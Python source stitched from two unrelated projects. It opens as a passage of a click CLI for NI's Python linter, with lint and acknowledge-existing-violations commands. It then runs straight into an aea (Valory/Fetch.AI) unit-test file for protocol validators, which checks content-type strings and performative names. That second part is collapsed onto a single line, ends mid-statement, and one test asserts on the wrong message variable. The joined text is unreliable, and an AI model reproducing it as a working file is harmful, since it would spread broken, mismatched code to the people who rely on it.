        """Construct the click.Group with the config option."""
        kwargs["params"].append(
            click.Option(
                ["--config"],
                type=click.Path(
                    exists=True,
                    file_okay=True,
                    dir_okay=False,
                    readable=True,
                    allow_dash=False,
                    path_type=str,
                ),
                is_eager=True,
                callback=_read_pyproject_toml,
                help="Config file to load configurable options from",
            )
        )
        super().__init__(*args, **kwargs)


@click.group(cls=ConfigGroup)
@click.option(
    "-v",
    "--verbose",
    count=True,
    help="Print more information. Repeat to increase verbosity.",
)
@click.option(
    "-q",
    "--quiet",
    count=True,
    help="Print less information. Repeat to decrease verbosity.",
)
@click.option(
    "--exclude",
    type=str,
    show_default=True,
    default="__pycache__,.git,.venv",
    help="Comma-separated list of files or directories to exclude.",
)
@click.option(
    "--extend-exclude",
    type=str,
    default="",
    help="Comma-separated list of files or directories to exclude (in addition to --exclude).",
)
@click.version_option()  # @TODO: override the message to include dependency version(s)
@click.pass_context
def main(ctx, verbose, quiet, config, exclude, extend_exclude):
    """NI's internal and external Python linter rules and plugins."""  # noqa: D4
    ctx.ensure_object(dict)
    ctx.obj["VERBOSITY"] = verbose - quiet
    ctx.obj["EXCLUDE"] = ",".join(filter(bool, [exclude.strip(","), extend_exclude.strip(",")]))
    ctx.obj["APP_IMPORT_NAMES"] = _get_application_import_names(ctx.obj.get("PYPROJECT", {}))


def _lint(obj, format, extend_ignore, file_or_dir):
    app = flake8.main.application.Application()
    args = [
        _qs_or_vs(obj["VERBOSITY"]),
        f"--config={(pathlib.Path(__file__).parent / 'config.ini').resolve()}",
        f"--exclude={obj['EXCLUDE']}" if obj["EXCLUDE"] else "",
        f"--format={format}" if format else "",
        f"--extend-ignore={extend_ignore}" if extend_ignore else "",
        # The only way to configure flake8-black's line length is through a pyproject.toml's
        # [tool.black] setting (which makes sense if you think about it),
        # so we need to give it one.
        f"--black-config={(pathlib.Path(__file__).parent / 'config.toml').resolve()}",
        f"--application-import-names={obj['APP_IMPORT_NAMES']}",
        *file_or_dir,
    ]
    app.run(list(filter(bool, args)))
    app.exit()


@main.command()
# @TODO: When we're ready to encourage editor integration, add a --diff flag
@click.option("--format", type=str, help="Format errors according to the chosen formatter.")
@click.option(
    "--extend-ignore",
    type=str,
    help="Comma-separated list of errors and warnings to ignore (or skip)",
)
@click.argument("file_or_dir", nargs=-1)
@click.pass_obj
def lint(obj, format, extend_ignore, file_or_dir):
    """Lint the file(s)/directory(s) given."""  # noqa: D4
    _lint(obj=obj, format=format, extend_ignore=extend_ignore, file_or_dir=file_or_dir)


@main.command()
@click.option(
    "--extend-ignore",
    type=str,
    help="Comma-separated list of errors and warnings to ignore (or skip)",
)
@click.argument("file_or_dir", nargs=-1)
@click.pass_obj
def acknowledge_existing_violations(obj, extend_ignore, file_or_dir):
    """Lint existing errors and suppress them.

    Use this command to acknowledge violations in existing code to allow for
    enforcing new code.
    """
    logging.info("linting code")
    capture = StringIO()
    with contextlib.redirect_stdout(capture):
        try:
            _lint(obj=obj, format=None, extend_ignore=extend_ignore, file_or_dir=file_or_dir)
        except SystemExit:
            pass  # the flake8 app always wants to SystemExit :(
    lines = capture.getvalue().splitlines()
    _acknowledge_existing_errors.acknowledge_lint_errors(lines)
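# A minimal in-process invocation sketch, assuming click's test runner is
# acceptable for experimentation; the "src/" target path is a hypothetical
# example, and the __main__ guard keeps this out of normal CLI usage.
if __name__ == "__main__":
    from click.testing import CliRunner

    runner = CliRunner()
    # Equivalent to running `ni-python-styleguide lint src/` from a shell.
    result = runner.invoke(main, ["lint", "src/"])
    print(result.exit_code)
    print(result.output)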
# -*- coding: utf-8 -*- # ------------------------------------------------------------------------------ # # Copyright 2022 Valory AG # Copyright 2018-2020 Fetch.AI Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ------------------------------------------------------------------------------ """This module contains the tests for generator/validate.py module.""" import logging from unittest import TestCase, mock from aea.configurations.base import CRUDCollection, SpeechActContentConfig from aea.protocols.generator.validate import ( CONTENT_NAME_REGEX_PATTERN, END_STATE_REGEX_PATTERN, PERFORMATIVE_REGEX_PATTERN, ROLE_REGEX_PATTERN, _has_brackets, _is_reserved_name, _is_valid_content_type_format, _is_valid_ct, _is_valid_dict, _is_valid_list, _is_valid_optional, _is_valid_pt, _is_valid_regex, _is_valid_set, _is_valid_union, _validate_content_name, _validate_content_type, _validate_dialogue_section, _validate_end_states, _validate_field_existence, _validate_initiation, _validate_keep_terminal, _validate_performatives, _validate_protocol_buffer_schema_code_snippets, _validate_reply, _validate_roles, _validate_speech_acts_section, _validate_termination, validate, ) logger = logging.getLogger("aea") logging.basicConfig(level=logging.INFO) class TestValidate(TestCase): """Test for generator/validate.py.""" def test_is_reserved_name(self): """Test for the '_is_reserved_name' method.""" invalid_content_name_1 = "_body" assert _is_reserved_name(invalid_content_name_1) is True invalid_content_name_2 = "message_id" assert _is_reserved_name(invalid_content_name_2) is True invalid_content_name_3 = "dialogue_reference" assert _is_reserved_name(invalid_content_name_3) is True invalid_content_name_4 = "target" assert _is_reserved_name(invalid_content_name_4) is True invalid_content_name_5 = "performative" assert _is_reserved_name(invalid_content_name_5) is True valid_content_nam_1 = "content_name" assert _is_reserved_name(valid_content_nam_1) is False valid_content_name_2 = "query" assert _is_reserved_name(valid_content_name_2) is False valid_content_name_3 = "ThiSiSAConTEnT234" assert _is_reserved_name(valid_content_name_3) is False def test_is_valid_regex(self): """Test for the '_is_valid_regex' method.""" regex_1 = "^[0-9][a-zA-Z0-9]*[A-Z]$" valid_text_1 = "53453hKb35nDkG" assert _is_valid_regex(regex_1, valid_text_1) is True invalid_text_1 = "hKbnDkG" assert _is_valid_regex(regex_1, invalid_text_1) is False invalid_text_2 = "4f nkG" assert _is_valid_regex(regex_1, invalid_text_2) is False def test_has_brackets(self): """Test for the '_has_brackets' method.""" valid_content_type_1 = "pt:set[pt:int]" assert _has_brackets(valid_content_type_1) is True valid_content_type_2 = "pt:union[hskdjf-8768&^${]hsdkjhfk]" assert _has_brackets(valid_content_type_2) is True valid_content_type_3 = "pt:optional[[]]" assert _has_brackets(valid_content_type_3) is True ################################################### invalid_content_type_1 = "ct:set[pt:int]" with self.assertRaises(SyntaxError) as cm: 
_has_brackets(invalid_content_type_1) self.assertEqual( str(cm.exception), "Content type must be a compositional type!" ) invalid_content_type_2 = "pt:tuple[pt:float]" with self.assertRaises(SyntaxError) as cm: _has_brackets(invalid_content_type_2) self.assertEqual( str(cm.exception), "Content type must be a compositional type!" ) invalid_content_type_3 = "pt:optinal[pt:bool]" with self.assertRaises(SyntaxError) as cm: _has_brackets(invalid_content_type_3) self.assertEqual( str(cm.exception), "Content type must be a compositional type!" ) ################################################### invalid_content_type_4 = "pt:optional{}" assert _has_brackets(invalid_content_type_4) is False invalid_content_type_5 = "pt:set[]7657" assert _has_brackets(invalid_content_type_5) is False invalid_content_type_6 = "pt:union [pt:int, pt:bool]" assert _has_brackets(invalid_content_type_6) is False invalid_content_type_7 = "pt:dict[pt:int, pt:bool] " assert _has_brackets(invalid_content_type_7) is False def test_is_valid_ct(self): """Test for the '_is_valid_ct' method.""" valid_content_type_1 = "ct:DataModel" assert _is_valid_ct(valid_content_type_1) is True valid_content_type_2 = "ct:ThisIsACustomContent" assert _is_valid_ct(valid_content_type_2) is True valid_content_type_3 = "ct:Query" assert _is_valid_ct(valid_content_type_3) is True valid_content_type_4 = " ct:Proposal " assert _is_valid_ct(valid_content_type_4) is True valid_content_type_5 = "ct:DSA" assert _is_valid_ct(valid_content_type_5) is True valid_content_type_6 = "ct:DataF" assert _is_valid_ct(valid_content_type_6) is True ################################################### invalid_content_type_1 = "ct:data" assert _is_valid_ct(invalid_content_type_1) is False invalid_content_type_2 = "Model" assert _is_valid_ct(invalid_content_type_2) is False invalid_content_type_3 = "ct: DataModel" assert _is_valid_ct(invalid_content_type_3) is False invalid_content_type_4 = "ct:E3" assert _is_valid_ct(invalid_content_type_4) is False def test_is_valid_pt(self): """Test for the '_is_valid_pt' method.""" valid_content_type_1 = "pt:bytes" assert _is_valid_pt(valid_content_type_1) is True valid_content_type_2 = "pt:int" assert _is_valid_pt(valid_content_type_2) is True valid_content_type_3 = "pt:float" assert _is_valid_pt(valid_content_type_3) is True valid_content_type_4 = "pt:bool" assert _is_valid_pt(valid_content_type_4) is True valid_content_type_5 = "pt:str" assert _is_valid_pt(valid_content_type_5) is True valid_content_type_6 = " pt:int " assert _is_valid_pt(valid_content_type_6) is True ################################################### invalid_content_type_1 = "pt:integer" assert _is_valid_pt(invalid_content_type_1) is False invalid_content_type_2 = "bool" assert _is_valid_pt(invalid_content_type_2) is False invalid_content_type_3 = "pt: str" assert _is_valid_pt(invalid_content_type_3) is False invalid_content_type_4 = "pt;float" assert _is_valid_pt(invalid_content_type_4) is False def test_is_valid_set(self): """Test for the '_is_valid_set' method.""" valid_content_type_1 = "pt:set[pt:bytes]" assert _is_valid_set(valid_content_type_1) is True valid_content_type_2 = "pt:set[pt:int]" assert _is_valid_set(valid_content_type_2) is True valid_content_type_3 = "pt:set[pt:float]" assert _is_valid_set(valid_content_type_3) is True valid_content_type_4 = "pt:set[pt:bool]" assert _is_valid_set(valid_content_type_4) is True valid_content_type_5 = "pt:set[pt:str]" assert _is_valid_set(valid_content_type_5) is True valid_content_type_6 = " pt:set[ pt:int ] " 
assert _is_valid_set(valid_content_type_6) is True ################################################### invalid_content_type_1 = "pt:frozenset[pt:int]" assert _is_valid_set(invalid_content_type_1) is False invalid_content_type_2 = "set[pt:int]" assert _is_valid_set(invalid_content_type_2) is False invalid_content_type_3 = "pt: set[pt:int]" assert _is_valid_set(invalid_content_type_3) is False invalid_content_type_4 = "pt:set[integer]" assert _is_valid_set(invalid_content_type_4) is False invalid_content_type_5 = "pt:set[int]" assert _is_valid_set(invalid_content_type_5) is False invalid_content_type_6 = "pt:set{int]" assert _is_valid_set(invalid_content_type_6) is False invalid_content_type_7 = "pt:set[pt:int, pt:str]" assert _is_valid_set(invalid_content_type_7) is False invalid_content_type_8 = "pt:set[]" assert _is_valid_set(invalid_content_type_8) is False invalid_content_type_9 = "pt:set[pt:list[pt:int, pt:list[pt:bool]]" assert _is_valid_set(invalid_content_type_9) is False invalid_content_type_10 = "pt:set" assert _is_valid_set(invalid_content_type_10) is False def test_is_valid_list(self): """Test for the '_is_valid_list' method.""" valid_content_type_1 = "pt:list[pt:bytes]" assert _is_valid_list(valid_content_type_1) is True valid_content_type_2 = "pt:list[pt:int]" assert _is_valid_list(valid_content_type_2) is True valid_content_type_3 = "pt:list[pt:float]" assert _is_valid_list(valid_content_type_3) is True valid_content_type_4 = "pt:list[pt:bool]" assert _is_valid_list(valid_content_type_4) is True valid_content_type_5 = "pt:list[pt:str]" assert _is_valid_list(valid_content_type_5) is True valid_content_type_6 = " pt:list[ pt:bool ] " assert _is_valid_list(valid_content_type_6) is True ################################################### invalid_content_type_1 = "pt:tuple[pt:bytes]" assert _is_valid_list(invalid_content_type_1) is False invalid_content_type_2 = "list[pt:bool]" assert _is_valid_list(invalid_content_type_2) is False invalid_content_type_3 = "pt: list[pt:float]" assert _is_valid_list(invalid_content_type_3) is False invalid_content_type_4 = "pt:list[string]" assert _is_valid_list(invalid_content_type_4) is False invalid_content_type_5 = "pt:list[bool]" assert _is_valid_list(invalid_content_type_5) is False invalid_content_type_6 = "pt:list[bytes" assert _is_valid_list(invalid_content_type_6) is False invalid_content_type_7 = "pt:list[pt:float, pt:bool]" assert _is_valid_list(invalid_content_type_7) is False invalid_content_type_8 = "pt:list[]" assert _is_valid_list(invalid_content_type_8) is False invalid_content_type_9 = "pt:list[pt:set[pt:bool, pt:set[pt:str]]" assert _is_valid_list(invalid_content_type_9) is False invalid_content_type_10 = "pt:list" assert _is_valid_list(invalid_content_type_10) is False def test_is_valid_dict(self): """Test for the '_is_valid_dict' method.""" valid_content_type_1 = "pt:dict[pt:bytes, pt:int]" assert _is_valid_dict(valid_content_type_1) is True valid_content_type_2 = "pt:dict[pt:int, pt:int]" assert _is_valid_dict(valid_content_type_2) is True valid_content_type_3 = "pt:dict[pt:float, pt:str]" assert _is_valid_dict(valid_content_type_3) is True valid_content_type_4 = "pt:dict[pt:bool, pt:str]" assert _is_valid_dict(valid_content_type_4) is True valid_content_type_5 = "pt:dict[pt:bool,pt:float]" assert _is_valid_dict(valid_content_type_5) is True valid_content_type_6 = " pt:dict[ pt:bytes , pt:int ] " assert _is_valid_dict(valid_content_type_6) is True ################################################### invalid_content_type_1 = 
"pt:map[pt:bool, pt:str]" assert _is_valid_dict(invalid_content_type_1) is False invalid_content_type_2 = "dict[pt:int, pt:float]" assert _is_valid_dict(invalid_content_type_2) is False invalid_content_type_3 = "pt: dict[pt:bytes, pt:bool]" assert _is_valid_dict(invalid_content_type_3) is False invalid_content_type_4 = "pt:dict[float, pt:str]" assert _is_valid_dict(invalid_content_type_4) is False invalid_content_type_5 = "pt:dict[pt:bool, pt:integer]" assert _is_valid_dict(invalid_content_type_5) is False invalid_content_type_6 = "pt:dict(pt:boolean, pt:int" assert _is_valid_dict(invalid_content_type_6) is False invalid_content_type_7 = "pt:dict[pt:boolean]" assert _is_valid_dict(invalid_content_type_7) is False invalid_content_type_8 = "pt:dict[]" assert _is_valid_dict(invalid_content_type_8) is False invalid_content_type_9 = "pt:dict[pt:str, pt:float, pt:int, pt:bytes]" assert _is_valid_dict(invalid_content_type_9) is False invalid_content_type_10 = "pt:dict[pt:set[pt:bool, pt:str]" assert _is_valid_dict(invalid_content_type_10) is False invalid_content_type_11 = "pt:dict" assert _is_valid_dict(invalid_content_type_11) is False def test_is_valid_union(self): """Test for the '_is_valid_union' method.""" valid_content_type_1 = ( "pt:union[pt:bytes, pt:int, pt:float, pt:bool, pt:str, pt:set[pt:bytes], " "pt:set[pt:int], pt:set[pt:float], pt:set[pt:bool], pt:set[pt:str], " "pt:list[pt:bytes], pt:list[pt:int], pt:list[pt:float], pt:list[pt:bool], pt:list[pt:str], " "pt:dict[pt:bytes, pt:bytes], pt:dict[ pt:bytes , pt:int ] , pt:dict[pt:bytes, pt:float], pt:dict[pt:bytes, pt:bool], pt:dict[pt:bytes, pt:str], " "pt:dict[pt:int, pt:bytes], pt:dict[pt:int, pt:int], pt:dict[pt:int, pt:float], pt:dict[pt:int, pt:bool], pt:dict[pt:int, pt:str], " "pt:dict[pt:float, pt:bytes], pt:dict[pt:float, pt:int], pt:dict[pt:float, pt:float], pt:dict[pt:float, pt:bool], pt:dict[pt:float, pt:str], " "pt:dict[pt:bool, pt:bytes], pt:dict[pt:bool, pt:int], pt:dict[pt:bool,pt:float], pt:dict[pt:bool, pt:bool], pt:dict[pt:bool, pt:str], " "pt:dict[pt:str, pt:bytes], pt:dict[pt:str, pt:int], pt:dict[pt:str,pt:float], pt:dict[pt:str, pt:bool], pt:dict[pt:str, pt:str]]" ) assert _is_valid_union(valid_content_type_1) is True valid_content_type_2 = "pt:union[pt:bytes, pt:set[pt:int]]" assert _is_valid_union(valid_content_type_2) is True valid_content_type_3 = "pt:union[pt:float, pt:bool]" assert _is_valid_union(valid_content_type_3) is True valid_content_type_4 = "pt:union[pt:set[pt:int], pt:set[pt:float]]" assert _is_valid_union(valid_content_type_4) is True valid_content_type_5 = "pt:union[pt:bool,pt:bytes]" assert _is_valid_union(valid_content_type_5) is True valid_content_type_6 = " pt:union[ pt:bytes , pt:set[ pt:int ] ] " assert _is_valid_union(valid_content_type_6) is True ################################################### invalid_content_type_1 = "pt:onion[pt:bool, pt:str]" assert _is_valid_union(invalid_content_type_1) is False invalid_content_type_2 = "union[pt:int, pt:float]" assert _is_valid_union(invalid_content_type_2) is False invalid_content_type_3 = "pt: union[pt:set[pt:int], pt:bool]" assert _is_valid_union(invalid_content_type_3) is False invalid_content_type_4 = "pt:union[float, pt:str" assert _is_valid_union(invalid_content_type_4) is False invalid_content_type_5 = "pt:union[pt:int, pt:dict[pt:str, pt:bool]" assert _is_valid_union(invalid_content_type_5) is False invalid_content_type_6 = "pt:union{pt:boolean, pt:int]" assert _is_valid_union(invalid_content_type_6) is False invalid_content_type_7 = 
"pt:union[pt:boolean]" assert _is_valid_union(invalid_content_type_7) is False invalid_content_type_8 = "pt:union[]" assert _is_valid_union(invalid_content_type_8) is False invalid_content_type_9 = "pt:union[pt:str, pt:int, pt:str]" assert _is_valid_union(invalid_content_type_9) is False invalid_content_type_10 = "pt:union[pt:set[pt:integer], pt:float]" assert _is_valid_union(invalid_content_type_10) is False invalid_content_type_11 = ( "pt:union[pt:dict[pt:set[pt:bool]], pt:list[pt:set[pt:str]]]" ) assert _is_valid_union(invalid_content_type_11) is False invalid_content_type_12 = "pt:union" assert _is_valid_union(invalid_content_type_12) is False def test_is_valid_optional(self): """Test for the '_is_valid_optional' method.""" valid_content_type_1 = ( "pt:optional[pt:union[pt:bytes, pt:int, pt:float, pt:bool, pt:str, pt:set[pt:bytes], " "pt:set[pt:int], pt:set[pt:float], pt:set[pt:bool], pt:set[pt:str], " "pt:list[pt:bytes], pt:list[pt:int], pt:list[pt:float], pt:list[pt:bool], pt:list[pt:str], " "pt:dict[pt:bytes, pt:bytes], pt:dict[ pt:bytes , pt:int ] , pt:dict[pt:bytes, pt:float], pt:dict[pt:bytes, pt:bool], pt:dict[pt:bytes, pt:str], " "pt:dict[pt:int, pt:bytes], pt:dict[pt:int, pt:int], pt:dict[pt:int, pt:float], pt:dict[pt:int, pt:bool], pt:dict[pt:int, pt:str], " "pt:dict[pt:float, pt:bytes], pt:dict[pt:float, pt:int], pt:dict[pt:float, pt:float], pt:dict[pt:float, pt:bool], pt:dict[pt:float, pt:str], " "pt:dict[pt:bool, pt:bytes], pt:dict[pt:bool, pt:int], pt:dict[pt:bool,pt:float], pt:dict[pt:bool, pt:bool], pt:dict[pt:bool, pt:str], " "pt:dict[pt:str, pt:bytes], pt:dict[pt:str, pt:int], pt:dict[pt:str,pt:float], pt:dict[pt:str, pt:bool], pt:dict[pt:str, pt:str]]]" ) assert _is_valid_optional(valid_content_type_1) is True valid_content_type_2 = "pt:optional[pt:union[pt:bytes, pt:set[pt:int]]]" assert _is_valid_optional(valid_content_type_2) is True valid_content_type_3 = "pt:optional[pt:bytes]" assert _is_valid_optional(valid_content_type_3) is True valid_content_type_4 = "pt:optional[pt:int]" assert _is_valid_optional(valid_content_type_4) is True valid_content_type_5 = "pt:optional[pt:float]" assert _is_valid_optional(valid_content_type_5) is True valid_content_type_6 = "pt:optional[pt:bool]" assert _is_valid_optional(valid_content_type_6) is True valid_content_type_7 = "pt:optional[pt:str]" assert _is_valid_optional(valid_content_type_7) is True valid_content_type_8 = "pt:optional[pt:set[pt:bytes]]" assert _is_valid_optional(valid_content_type_8) is True valid_content_type_9 = "pt:optional[pt:list[pt:int]]" assert _is_valid_optional(valid_content_type_9) is True valid_content_type_10 = ( " pt:optional[ pt:dict[ pt:float , pt:bool ] ] " ) assert _is_valid_optional(valid_content_type_10) is True ################################################### invalid_content_type_1 = "pt:optinal[pt:bytes]" assert _is_valid_optional(invalid_content_type_1) is False invalid_content_type_2 = "optional[pt:int]" assert _is_valid_optional(invalid_content_type_2) is False invalid_content_type_3 = "pt: optional[pt:float]" assert _is_valid_optional(invalid_content_type_3) is False invalid_content_type_4 = "pt:optional[bool]" assert _is_valid_optional(invalid_content_type_4) is False invalid_content_type_5 = "pt:optional[pt:str" assert _is_valid_optional(invalid_content_type_5) is False invalid_content_type_6 = "pt:optional{pt:set[pt:int]]" assert _is_valid_optional(invalid_content_type_6) is False invalid_content_type_7 = "pt:optional[pt:string]" assert _is_valid_optional(invalid_content_type_7) is 
False invalid_content_type_8 = "pt:optional[]" assert _is_valid_optional(invalid_content_type_8) is False invalid_content_type_9 = "pt:optional[pt:str, pt:int, pt:list[pt:bool]]" assert _is_valid_optional(invalid_content_type_9) is False invalid_content_type_10 = "pt:optional[pt:list[pt:boolean]]" assert _is_valid_optional(invalid_content_type_10) is False invalid_content_type_11 = "pt:optional[pt:dict[pt:set[pt:int]]]" assert _is_valid_optional(invalid_content_type_11) is False invalid_content_type_12 = "pt:optional" assert _is_valid_optional(invalid_content_type_12) is False def test_is_valid_content_type_format(self): """Test for the '_is_valid_content_type_format' method.""" valid_content_type_1 = "ct:DataModel" assert _is_valid_content_type_format(valid_content_type_1) is True valid_content_type_2 = "pt:int" assert _is_valid_content_type_format(valid_content_type_2) is True valid_content_type_3 = "pt:set[pt:float]" assert _is_valid_content_type_format(valid_content_type_3) is True valid_content_type_4 = "pt:list[pt:bool]" assert _is_valid_content_type_format(valid_content_type_4) is True valid_content_type_5 = "pt:dict[pt:bool,pt:float]" assert _is_valid_content_type_format(valid_content_type_5) is True valid_content_type_6 = ( "pt:optional[pt:union[pt:bytes, pt:int, pt:float, pt:bool, pt:str, pt:set[pt:bytes], " "pt:set[pt:int], pt:set[pt:float], pt:set[pt:bool], pt:set[pt:str], " "pt:list[pt:bytes], pt:list[pt:int], pt:list[pt:float], pt:list[pt:bool], pt:list[pt:str], " "pt:dict[pt:bytes, pt:bytes], pt:dict[ pt:bytes , pt:int ] , pt:dict[pt:bytes, pt:float], pt:dict[pt:bytes, pt:bool], pt:dict[pt:bytes, pt:str], " "pt:dict[pt:int, pt:bytes], pt:dict[pt:int, pt:int], pt:dict[pt:int, pt:float], pt:dict[pt:int, pt:bool], pt:dict[pt:int, pt:str], " "pt:dict[pt:float, pt:bytes], pt:dict[pt:float, pt:int], pt:dict[pt:float, pt:float], pt:dict[pt:float, pt:bool], pt:dict[pt:float, pt:str], " "pt:dict[pt:bool, pt:bytes], pt:dict[pt:bool, pt:int], pt:dict[pt:bool,pt:float], pt:dict[pt:bool, pt:bool], pt:dict[pt:bool, pt:str], " "pt:dict[pt:str, pt:bytes], pt:dict[pt:str, pt:int], pt:dict[pt:str,pt:float], pt:dict[pt:str, pt:bool], pt:dict[pt:str, pt:str]]]" ) assert _is_valid_content_type_format(valid_content_type_6) is True valid_content_type_7 = ( " pt:optional[ pt:dict[ pt:float , pt:bool ] ] " ) assert _is_valid_content_type_format(valid_content_type_7) is True ################################################### invalid_content_type_1 = "ct:data" assert _is_valid_content_type_format(invalid_content_type_1) is False invalid_content_type_2 = "bool" assert _is_valid_content_type_format(invalid_content_type_2) is False invalid_content_type_3 = "pt: set[pt:int]" assert _is_valid_content_type_format(invalid_content_type_3) is False invalid_content_type_4 = "pt:list[string]" assert _is_valid_content_type_format(invalid_content_type_4) is False invalid_content_type_5 = "pt:dict[pt:bool, pt:integer]" assert _is_valid_content_type_format(invalid_content_type_5) is False invalid_content_type_6 = "pt:union{pt:boolean, pt:int]" assert _is_valid_content_type_format(invalid_content_type_6) is False invalid_content_type_7 = "pt:optional[pt:str, pt:int, pt:list[pt:bool]]" assert _is_valid_content_type_format(invalid_content_type_7) is False def test_validate_performatives(self): """Test for the '_validate_performatives' method.""" valid_content_type_1 = "offer" valid_result_1, valid_msg_1 = _validate_performatives(valid_content_type_1) assert valid_result_1 is True assert valid_msg_1 == "Performative 
'{}' is valid.".format(valid_content_type_1) valid_content_type_2 = "send_HTTP_message" valid_result_2, valid_msg_2 = _validate_performatives(valid_content_type_2) assert valid_result_2 is True assert valid_msg_2 == "Performative '{}' is valid.".format(valid_content_type_2) valid_content_type_3 = "request_2PL" valid_result_3, valid_msg_3 = _validate_performatives(valid_content_type_3) assert valid_result_3 is True assert valid_msg_3 == "Performative '{}' is valid.".format(valid_content_type_3) valid_content_type_4 = "argue" valid_result_4, valid_msg_4 = _validate_performatives(valid_content_type_4) assert valid_result_4 is True assert valid_msg_4 == "Performative '{}' is valid.".format(valid_content_type_4) ################################################### invalid_content_type_1 = "_offer" invalid_result_1, invalid_msg_1 = _validate_performatives( invalid_content_type_1 ) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_content_type_1, PERFORMATIVE_REGEX_PATTERN ) ) invalid_content_type_2 = "request_" invalid_result_2, invalid_msg_2 = _validate_performatives( invalid_content_type_2 ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_content_type_2, PERFORMATIVE_REGEX_PATTERN ) ) invalid_content_type_3 = "_query_" invalid_result_3, invalid_msg_3 = _validate_performatives( invalid_content_type_3 ) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_content_type_3, PERFORMATIVE_REGEX_PATTERN ) ) invalid_content_type_4 = "$end" invalid_result_4, invalid_msg_4 = _validate_performatives( invalid_content_type_4 ) assert invalid_result_4 is False assert ( invalid_msg_4 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_content_type_4, PERFORMATIVE_REGEX_PATTERN ) ) invalid_content_type_5 = "create()" invalid_result_5, invalid_msg_5 = _validate_performatives( invalid_content_type_5 ) assert invalid_result_5 is False assert ( invalid_msg_5 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_content_type_5, PERFORMATIVE_REGEX_PATTERN ) ) invalid_content_type_6 = "_body" invalid_result_6, invalid_msg_6 = _validate_performatives( invalid_content_type_6 ) assert invalid_result_6 is False assert ( invalid_msg_6 == "Invalid name for performative '{}'. This name is reserved.".format( invalid_content_type_6, ) ) invalid_content_type_7 = "message_id" invalid_result_7, invalid_msg_7 = _validate_performatives( invalid_content_type_7 ) assert invalid_result_7 is False assert ( invalid_msg_6 == "Invalid name for performative '{}'. 
This name is reserved.".format( invalid_content_type_6, ) ) def test_validate_content_name(self): """Test for the '_validate_content_name' method.""" performative = "some_performative" valid_content_type_1 = "content" valid_result_1, valid_msg_1 = _validate_content_name( valid_content_type_1, performative ) assert valid_result_1 is True assert valid_msg_1 == "Content name '{}' of performative '{}' is valid.".format( valid_content_type_1, performative ) valid_content_type_2 = "HTTP_msg_name" valid_result_2, valid_msg_2 = _validate_content_name( valid_content_type_2, performative ) assert valid_result_2 is True assert valid_msg_2 == "Content name '{}' of performative '{}' is valid.".format( valid_content_type_2, performative ) valid_content_type_3 = "number_of_3PLs" valid_result_3, valid_msg_3 = _validate_content_name( valid_content_type_3, performative ) assert valid_result_3 is True assert valid_msg_3 == "Content name '{}' of performative '{}' is valid.".format( valid_content_type_3, performative ) valid_content_type_4 = "model" valid_result_4, valid_msg_4 = _validate_content_name( valid_content_type_4, performative ) assert valid_result_4 is True assert valid_msg_4 == "Content name '{}' of performative '{}' is valid.".format( valid_content_type_4, performative ) ################################################### invalid_content_type_1 = "_content" invalid_result_1, invalid_msg_1 = _validate_content_name( invalid_content_type_1, performative ) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid name for content '{}' of performative '{}'. Content names must match the following regular expression: {} ".format( invalid_content_type_1, performative, CONTENT_NAME_REGEX_PATTERN ) ) invalid_content_type_2 = "content_" invalid_result_2, invalid_msg_2 = _validate_content_name( invalid_content_type_2, performative ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid name for content '{}' of performative '{}'. Content names must match the following regular expression: {} ".format( invalid_content_type_2, performative, CONTENT_NAME_REGEX_PATTERN ) ) invalid_content_type_3 = "_content_" invalid_result_3, invalid_msg_3 = _validate_content_name( invalid_content_type_3, performative ) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid name for content '{}' of performative '{}'. Content names must match the following regular expression: {} ".format( invalid_content_type_3, performative, CONTENT_NAME_REGEX_PATTERN ) ) invalid_content_type_4 = "con^en^" invalid_result_4, invalid_msg_4 = _validate_content_name( invalid_content_type_4, performative ) assert invalid_result_4 is False assert ( invalid_msg_4 == "Invalid name for content '{}' of performative '{}'. Content names must match the following regular expression: {} ".format( invalid_content_type_4, performative, CONTENT_NAME_REGEX_PATTERN ) ) invalid_content_type_5 = "some_content()" invalid_result_5, invalid_msg_5 = _validate_content_name( invalid_content_type_5, performative ) assert invalid_result_5 is False assert ( invalid_msg_5 == "Invalid name for content '{}' of performative '{}'. Content names must match the following regular expression: {} ".format( invalid_content_type_5, performative, CONTENT_NAME_REGEX_PATTERN ) ) invalid_content_type_6 = "target" invalid_result_6, invalid_msg_6 = _validate_content_name( invalid_content_type_6, performative ) assert invalid_result_6 is False assert ( invalid_msg_6 == "Invalid name for content '{}' of performative '{}'. 
This name is reserved.".format( invalid_content_type_6, performative, ) ) invalid_content_type_7 = "performative" invalid_result_7, invalid_msg_7 = _validate_content_name( invalid_content_type_7, performative ) assert invalid_result_7 is False assert ( invalid_msg_7 == "Invalid name for content '{}' of performative '{}'. This name is reserved.".format( invalid_content_type_7, performative, ) ) def test_validate_content_type(self): """Test for the '_validate_content_type' method.""" performative = "some_performative" content_name = "some_content_name" valid_content_type_1 = "ct:DataModel" valid_result_1, valid_msg_1 = _validate_content_type( valid_content_type_1, content_name, performative ) assert valid_result_1 is True assert ( valid_msg_1 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_2 = "pt:int" valid_result_2, valid_msg_2 = _validate_content_type( valid_content_type_2, content_name, performative ) assert valid_result_2 is True assert ( valid_msg_2 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_3 = "pt:set[pt:float]" valid_result_3, valid_msg_3 = _validate_content_type( valid_content_type_3, content_name, performative ) assert valid_result_3 is True assert ( valid_msg_3 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_4 = "pt:list[pt:bool]" valid_result_4, valid_msg_4 = _validate_content_type( valid_content_type_4, content_name, 